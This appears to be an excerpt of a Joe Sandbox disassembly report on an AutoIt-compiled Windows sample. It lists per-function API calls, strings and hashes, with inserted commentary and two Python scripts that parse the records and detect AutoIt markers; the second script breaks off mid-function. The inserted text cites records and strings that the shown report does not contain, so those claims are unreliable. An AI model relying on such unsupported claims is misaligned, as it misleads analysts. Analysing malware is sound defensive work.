              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 163e3cd1dcffd89569df6d52e55534e31fc32f497d8dda8a1e09e43c307ec38d
              • Instruction ID: 37f4a234871d6a48fa4b757e112c5fa47bcd1a87ebf335bcb87b2144b9575782
              • Opcode Fuzzy Hash: 163e3cd1dcffd89569df6d52e55534e31fc32f497d8dda8a1e09e43c307ec38d
              • Instruction Fuzzy Hash: A6A0113008820CABCA002B82FC08888BFACEA002A0B0080A0FC0C808228B32A8208A80
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 25a8bd5f75c23284f44707c11caef5bb433f87629a662d57f3b9195c760907f9
              • Instruction ID: b91ac22949b76e3aaf936ee4d3bf6ad92e6353f6a939ca68ccacc54ec9dca9f4
              • Opcode Fuzzy Hash: 25a8bd5f75c23284f44707c11caef5bb433f87629a662d57f3b9195c760907f9
              • Instruction Fuzzy Hash: A1220370A05616CBDF388F28C4946BDB7A2FB03344F69886BD8429B791DB34DD81DB61
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction ID: 68c6559c4a5a2bcbc8d6b498efe2b76def4c8a433f3ba7b7f50c3477afaf4f97
              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction Fuzzy Hash: 97C1823A2051A309DF6D863D943413EBAE16EA37B171A075DE8B3CB5C5EF20D568E620
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction ID: d36184d0adba20972da0072465a3f4869a0bb458e934b9a72aaecddf7c956db5
              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction Fuzzy Hash: 1DC1913A2051A30ADF6D463E943403EBBE15AA37B171A076DE4B2DB5D5EF30D528E620
              APIs
              • DeleteObject.GDI32(00000000), ref: 001F7B70
              • DeleteObject.GDI32(00000000), ref: 001F7B82
              • DestroyWindow.USER32 ref: 001F7B90
              • GetDesktopWindow.USER32 ref: 001F7BAA
              • GetWindowRect.USER32(00000000), ref: 001F7BB1
              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 001F7CF2
              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 001F7D02
              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7D4A
              • GetClientRect.USER32(00000000,?), ref: 001F7D56
              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001F7D90
              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DB2
              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DC5
              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DD0
              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DD9
              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DE8
              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DF1
              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DF8
              • GlobalFree.KERNEL32(00000000), ref: 001F7E03
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7E15
              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00212CAC,00000000), ref: 001F7E2B
              • GlobalFree.KERNEL32(00000000), ref: 001F7E3B
              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 001F7E61
              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 001F7E80
              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7EA2
              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F808F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
              • String ID: $AutoIt v3$DISPLAY$static
              • API String ID: 2211948467-2373415609
              • Opcode ID: 4b0c0304de547b93f9452f5b9ee56b75b6ea18e2379d39a9d153853d434cd7f4
              • Instruction ID: f143b83e06e586e7b06772bd69f7603209c43e88d3e023a4eb9ea5cd67382973
              • Opcode Fuzzy Hash: 4b0c0304de547b93f9452f5b9ee56b75b6ea18e2379d39a9d153853d434cd7f4
              • Instruction Fuzzy Hash: EF027B75900209AFDB14DF64DD8DEBEBBB9EB49310F148158F915AB2A1CB71AD01CB60
              APIs
              • CharUpperBuffW.USER32(?,?,0020F910), ref: 002038AF
              • IsWindowVisible.USER32(?), ref: 002038D3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharUpperVisibleWindow
              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
              • API String ID: 4105515805-45149045
              • Opcode ID: 553fe3f4071cc919d0b35e92dffe420452c1b6c629ca6044496062fc1c4581e2
              • Instruction ID: 70cbf7fd352b6fdf6a44fe015eadda462d19b41bdb8cfa1824856909d41d9f1b
              • Opcode Fuzzy Hash: 553fe3f4071cc919d0b35e92dffe420452c1b6c629ca6044496062fc1c4581e2
              • Instruction Fuzzy Hash: 3FD1C374224306CBCB15EF50C491A6E77A9AFA8354F144459F8869B3E3CB71EE1ACB81
              APIs
              • SetTextColor.GDI32(?,00000000), ref: 0020A89F
              • GetSysColorBrush.USER32(0000000F), ref: 0020A8D0
              • GetSysColor.USER32(0000000F), ref: 0020A8DC
              • SetBkColor.GDI32(?,000000FF), ref: 0020A8F6
              • SelectObject.GDI32(?,?), ref: 0020A905
              • InflateRect.USER32(?,000000FF,000000FF), ref: 0020A930
              • GetSysColor.USER32(00000010), ref: 0020A938
              • CreateSolidBrush.GDI32(00000000), ref: 0020A93F
              • FrameRect.USER32(?,?,00000000), ref: 0020A94E
              • DeleteObject.GDI32(00000000), ref: 0020A955
              • InflateRect.USER32(?,000000FE,000000FE), ref: 0020A9A0
              • FillRect.USER32(?,?,?), ref: 0020A9D2
              • GetWindowLongW.USER32(?,000000F0), ref: 0020A9FD
                • Part of subcall function 0020AB60: GetSysColor.USER32(00000012), ref: 0020AB99
                • Part of subcall function 0020AB60: SetTextColor.GDI32(?,?), ref: 0020AB9D
                • Part of subcall function 0020AB60: GetSysColorBrush.USER32(0000000F), ref: 0020ABB3
                • Part of subcall function 0020AB60: GetSysColor.USER32(0000000F), ref: 0020ABBE
                • Part of subcall function 0020AB60: GetSysColor.USER32(00000011), ref: 0020ABDB
                • Part of subcall function 0020AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0020ABE9
                • Part of subcall function 0020AB60: SelectObject.GDI32(?,00000000), ref: 0020ABFA
                • Part of subcall function 0020AB60: SetBkColor.GDI32(?,00000000), ref: 0020AC03
                • Part of subcall function 0020AB60: SelectObject.GDI32(?,?), ref: 0020AC10
                • Part of subcall function 0020AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0020AC2F
                • Part of subcall function 0020AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0020AC46
                • Part of subcall function 0020AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0020AC5B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
              • String ID:
              • API String ID: 4124339563-0
              • Opcode ID: 0e8b095b029b10bba5873b05673a1436ee394aa08f774dcf958d862ac9718542
              • Instruction ID: 7fe658091adcd281baf80862e190800a0a4b39ae387d60d933acc8560db73a5f
              • Opcode Fuzzy Hash: 0e8b095b029b10bba5873b05673a1436ee394aa08f774dcf958d862ac9718542
              • Instruction Fuzzy Hash: E4A1BC72118301AFD7609F64ED0CA6BBBA9FF89320F504A29F962961E2D770D844CB52
              APIs
              • DestroyWindow.USER32(?,?,?), ref: 00182CA2
              • DeleteObject.GDI32(00000000), ref: 00182CE8
              • DeleteObject.GDI32(00000000), ref: 00182CF3
              • DestroyIcon.USER32(00000000,?,?,?), ref: 00182CFE
              • DestroyWindow.USER32(00000000,?,?,?), ref: 00182D09
              • SendMessageW.USER32(?,00001308,?,00000000), ref: 001BC68B
              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001BC6C4
              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001BCAED
                • Part of subcall function 00181B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00182036,?,00000000,?,?,?,?,001816CB,00000000,?), ref: 00181B9A
              • SendMessageW.USER32(?,00001053), ref: 001BCB2A
              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001BCB41
              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001BCB57
              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001BCB62
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
              • String ID: 0
              • API String ID: 464785882-4108050209
              • Opcode ID: a9c0d4f5700b75f5920cc847bd629a68017fb16b6b13c2db487b6d74abcab03e
              • Instruction ID: bd335d90ce6d0f5af414bdc8d49fb3a1cef3628e31da50025b380f8ebe50f1e8
              • Opcode Fuzzy Hash: a9c0d4f5700b75f5920cc847bd629a68017fb16b6b13c2db487b6d74abcab03e
              • Instruction Fuzzy Hash: A812AC30604201EFDB25DF24C988BA9BBE5BF45300F544569F89ADB662CB31ED42CFA1
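The per-function records above are machine-generated and repetitive, and an analyst usually wants them as structured data so that API usage can be searched across every function rather than read block by block. The script below is an example added to this page; it is not part of the Joe Sandbox report or its IDA plugin. It parses records in exactly the shape shown here (the "• Name.MODULE(args), ref: ADDR" call lines, the indented "Part of subcall function X:" variants, and the "• Key: value" metadata lines, with the "Instruction Fuzzy Hash" line closing each record) and flags a few calls of interest. The watch-list and its labels are my own assumption, a paraphrase of signature names from the report header; the embedded sample is assembled from lines of this excerpt with the repeated dump-file lines trimmed.

```python
"""Parse the per-function records of a Joe Sandbox IDA-plugin listing (the
"APIs" / "Memory Dump Source" / "Similarity" blocks in this report) and flag
API calls on a small watch-list. Added example for this page, not Joe Sandbox
code. WATCHLIST is my own paraphrase of signature names in the report header
(an assumption about what to flag); SAMPLE is built from lines of this page."""
import re
from dataclasses import dataclass, field
from typing import Optional

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall
# function X:"; args and ref are optional ("• DestroyWindow.USER32 ref: ...").
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
# "• Key: value" metadata lines (API ID, Opcode ID, Instruction Fuzzy Hash ...).
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

WATCHLIST = {  # assumption: API -> report signature wording, in my words
    "BlockInput": "blocks mouse and keyboard input (hinders debugging)",
    "LogonUserW": "logs a user on, used to run as a different user",
    "AdjustTokenPrivileges": "adjusts access-token privileges",
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str                          # call-site address in the function
    subcall_of: Optional[str] = None  # set when reported inside a callee

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # split from "String ID"
    fields: dict = field(default_factory=dict)   # raw "• Key: value" pairs

def parse(text: str) -> list:
    """One FunctionRecord per function: each record in this format ends with
    its "Instruction Fuzzy Hash" line, which closes the current record."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "",
                                    m["ref"] or "", m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue  # section labels such as "APIs" or "Similarity"
        key, val = m["key"], m["val"]
        cur.fields[key] = val
        if key == "String ID":
            cur.strings = [s for s in val.split("$") if s]
        elif key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records

def flag(records: list) -> list:
    """(opcode_id, api, ref, label) for each direct call on the watch-list."""
    return [(rec.fields.get("Opcode ID", ""), c.name, c.ref, WATCHLIST[c.name])
            for rec in records for c in rec.apis
            if c.subcall_of is None and c.name in WATCHLIST]

# Constructed sample: three records built from lines of this report excerpt,
# with the repeated "Associated" dump lines trimmed.
SAMPLE = """\
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001D8851), ref: 001D8728
• CloseHandle.KERNEL32(?,?,001D8851), ref: 001D873A
• Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• Opcode ID: 1f83b885dce90baadd485b502203a966d7e7ea5f4b4539ca047ff112e5d28064
• Instruction Fuzzy Hash: 77E0B676014650EEE7752B60FE09D777BA9EB047A0B258829B4A680871DB62AC90DB10
APIs
• BlockInput.USER32(00000001), ref: 001F4218
• API ID: BlockInput
• Opcode ID: 219820a6ec2de7410bdfffb4e0ede0458787b5b96308d7f7186c361c65bb5c9e
• Instruction Fuzzy Hash: 36E048352402145FC710EF59E844A6BF7DCAFA4760F058025FD49C7352DB71E940CB90
APIs
• DestroyWindow.USER32 ref: 001F7B90
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7D4A
  • Part of subcall function 0020AB60: GetSysColor.USER32(00000012), ref: 0020AB99
• API ID: Window$Global$CreateRect
• String ID: $AutoIt v3$DISPLAY$static
• Opcode ID: 4b0c0304de547b93f9452f5b9ee56b75b6ea18e2379d39a9d153853d434cd7f4
• Instruction Fuzzy Hash: EF027B75900209AFDB14DF64DD8DEBEBBB9EB49310F148158F915AB2A1CB71AD01CB60
"""

if __name__ == "__main__":
    for opcode_id, api, ref, label in flag(parse(SAMPLE)):
        print(f"{opcode_id[:12]}  {api:<22} @ {ref}  {label}")
```

Run it against a saved copy of the full function listing to get one record per function. "Part of subcall function" lines are kept but carry `subcall_of`, so `flag` reports only direct call sites; the "Opcode ID" field is used as the record key because the listing does not name the function itself, only its call-site addresses.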
              APIs
              • DestroyWindow.USER32(00000000), ref: 001F77F1
              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001F78B0
              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001F78EE
              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 001F7900
              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 001F7946
              • GetClientRect.USER32(00000000,?), ref: 001F7952
              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 001F7996
              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001F79A5
              • GetStockObject.GDI32(00000011), ref: 001F79B5
              • SelectObject.GDI32(00000000,00000000), ref: 001F79B9
              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001F79C9
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001F79D2
              • DeleteDC.GDI32(00000000), ref: 001F79DB
              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001F7A07
              • SendMessageW.USER32(00000030,00000000,00000001), ref: 001F7A1E
              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 001F7A59
              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001F7A6D
              • SendMessageW.USER32(00000404,00000001,00000000), ref: 001F7A7E
              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 001F7AAE
              • GetStockObject.GDI32(00000011), ref: 001F7AB9
              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001F7AC4
              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 001F7ACE
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
              • API String ID: 2910397461-517079104
              • Opcode ID: a2461272115318c352ec0180a715b7dcea1b53a8313f5e57a18f9a3db260d8a9
              • Instruction ID: 12c6b93ac837a9717c366fe467ffe6f98b2fbf6a10ce2ad3262625964a1ae901
              • Opcode Fuzzy Hash: a2461272115318c352ec0180a715b7dcea1b53a8313f5e57a18f9a3db260d8a9
              • Instruction Fuzzy Hash: 37A16F71A40209BFEB14DBA4ED4EFAABBA9EB45710F044114FA15A72E1C7B0AD00CF60
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 001EAF89
              • GetDriveTypeW.KERNEL32(?,0020FAC0,?,\\.\,0020F910), ref: 001EB066
              • SetErrorMode.KERNEL32(00000000,0020FAC0,?,\\.\,0020F910), ref: 001EB1C4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorMode$DriveType
              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
              • API String ID: 2907320926-4222207086
              • Opcode ID: 656ff29a0c26bf42b0300bc1ccba9f38aa9d38343480adde299e45c67354ce3b
              • Instruction ID: 13fcf64b586688bd4bb7394c47f789da96c582de423cd96478876f2b421542f3
              • Opcode Fuzzy Hash: 656ff29a0c26bf42b0300bc1ccba9f38aa9d38343480adde299e45c67354ce3b
              • Instruction Fuzzy Hash: 0B51F670698B85EBCB08EB12D9D2C7FB3B0AB25751B284025F44AA7291C735AE51CB42
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __wcsnicmp
              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
              • API String ID: 1038674560-86951937
              • Opcode ID: 7ba734dc515e7e27730559432206c70cfc103d8564aa71dee1fbddde1dbd0d82
              • Instruction ID: d37d356eed5c8cb8ee00fd4fabe42d5f5ddc6c6b0b3207b8f342a29165ced18f
              • Opcode Fuzzy Hash: 7ba734dc515e7e27730559432206c70cfc103d8564aa71dee1fbddde1dbd0d82
              • Instruction Fuzzy Hash: 708102B1740215BBCB25BA60CD83FEA77A8AF36704F044025F945AB1C6EB60DB55CBA1
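               The directive strings in the record above (the AutoIt preprocessor keywords compared with __wcsnicmp, together with the "AutoIt v3" and "AutoIt v3 GUI" window-class names seen in the CreateWindowExW calls earlier) are the kind of evidence behind the report's "Binary is likely a compiled AutoIt script file" signature. The Python script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it scans a raw file image for the UTF-16LE form of those strings and reports a verdict. The marker list, the threshold of three hits, and the constructed sample buffers are assumptions for illustration; the "AU3!EA06" tag is the documented marker that precedes the embedded compiled script in AutoIt-built executables and is not something this report shows.

```python
"""Offline check for the UTF-16LE strings that mark an AutoIt v3 interpreter.

Added example: not part of the Joe Sandbox report or of the analysed sample.
The marker list, the scoring threshold and the constructed sample buffers
below are assumptions for illustration.
"""
import re
from typing import Dict, List, Tuple

# Strings taken from the report's disassembly: the AutoIt v3 GUI window class
# and the script-preprocessor directives compared with __wcsnicmp. The
# interpreter is a Unicode build, so they are embedded as UTF-16LE.
AUTOIT_MARKERS: List[str] = [
    "AutoIt v3 GUI",
    "#OnAutoItStartRegister",
    "#requireadmin",
    "#include-once",
    "#notrayicon",
    "#pragma compile",
    "Bad directive syntax error",
    "Cannot parse #include",
    "Unterminated group of comments",
    "@GUI_DRAGFILE",
]

# Tag that precedes the embedded, compiled script inside AutoIt-built
# executables. Assumption: documented AutoIt marker, not shown in this report.
COMPILED_SCRIPT_TAG = b"AU3!EA06"


def find_autoit_markers(data: bytes) -> Dict[str, List[int]]:
    """Map each marker found in `data` to the byte offsets of its UTF-16LE form."""
    hits: Dict[str, List[int]] = {}
    for marker in AUTOIT_MARKERS:
        needle = re.escape(marker.encode("utf-16-le"))
        offsets = [m.start() for m in re.finditer(needle, data)]
        if offsets:
            hits[marker] = offsets
    return hits


def has_compiled_script_tag(data: bytes) -> bool:
    """True when the ASCII AU3!EA06 tag is present anywhere in the image."""
    return COMPILED_SCRIPT_TAG in data


def classify_autoit(data: bytes, min_markers: int = 3) -> Tuple[str, int]:
    """Return (verdict, marker_count).

    'autoit-compiled' : enough runtime markers plus the compiled-script tag
    'autoit-runtime'  : enough runtime markers, but no embedded script tag
    'no-autoit'       : fewer than `min_markers` runtime strings found
    """
    count = len(find_autoit_markers(data))
    if count < min_markers:
        return "no-autoit", count
    if has_compiled_script_tag(data):
        return "autoit-compiled", count
    return "autoit-runtime", count


def _build_sample() -> bytes:
    """Constructed stand-in for a PE image: filler, four markers, the tag."""
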